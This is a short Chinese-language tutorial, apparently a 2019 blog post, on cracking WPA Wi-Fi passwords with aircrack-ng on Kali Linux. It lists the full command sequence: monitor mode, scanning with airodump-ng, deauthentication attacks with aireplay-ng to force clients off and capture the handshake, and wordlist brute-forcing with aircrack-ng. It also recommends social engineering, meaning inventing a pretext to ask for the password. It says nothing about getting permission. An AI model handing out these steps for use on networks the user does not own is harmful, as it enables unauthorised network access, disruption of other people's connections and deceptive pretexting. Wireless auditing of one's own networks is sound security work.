无线安全审计工具aircrack-ng详解

无线渗透试的工具有很多,在windows下和Linux下的工具各有千秋,因在windows下的工具基本都是图形界面,操作起来比较直观易懂,在此就不再做过多介绍,本方重点介绍在linux下的一种通用的方法。
首先讲一下现行无线渗透试的一般方法和原理。
目前无线渗透试的两种方法:1、抓握手包,跑包。2、通过WPS进行跑pin码
当然第2种方法是要求路由器开启了wps功能。并且要求路由器没有设置pin防护,其它的方法如路由器漏洞等不在此讨论范围内。
WEP方式认证的路由器已经很少了,而且这种认证方式不但非常不安全且绝对可破,不再讲解,本文只讲WPA认证方式的渗透方法。
其实最有效的取得密码的方法是直接编个理由过去问!(社工)
原理:抓到的包中有密码的密文,做暴力跑包即可。

工具:aircrack-ng工具包(kali内置),一个支持监听模式的无线网卡。
第一步:开启无线网卡的监听模式。
这一步首先你的系统要识别你的无线网卡。
使用ifconfig -a命令查看你的网卡叫什么名字。比如叫wlan0

使用ifconfig wlan0 up激活你的无线网卡。

使用如下命令刷新下网卡驱动缓存

rfkill   block   wifi
rfkill  unblock  wifi


使用airmon-ng check kill结束系统中可能的干扰进程。

使用airmon-ng start wlan0开启你网卡的监听模式。并记住监听模式的名字。

这里注意一点,对于RTL8812au芯片的无线网卡,因为这个芯片的驱动是经过专门设计的,所以这里不能用airmon-ng start命令 开启监听模式。直接用airodump-ng wlan0监听即可。


第二步:监听周围wifi状态,选择要破解的无线路由器

使用airodump-ng wlan0mon开始监听(对于RTL8812au芯片的无线网卡直接 airodump-ng wlan0)

第三步:针对要要破解的wifi重新开启一个监听记录,发送断开命令,等待客户端重新连接时监听密码包。
airodump-ng -w 文件名(自己起一个名,用来保存监听到的数据) -c 监听频道 wlan0mon

打开另一个shell使用

aireplay-ng -0 1 -a 路由器的MAC地址 -c 客户端的MAC地址 wlan0mon

强制断开连 接到路由器的设备,以便在它再次连接时捕获它的认证包。
看看原来的airodump-ng的窗口是否在右上解提示有WPA handshake监听到


第四步:跑包测试加密的无线密码
aircrack-ng -w 准备好的密码字典 捕获到的数据包

其它教程请移步:37lab研究小站(37实验室)

编辑于 2019-04-13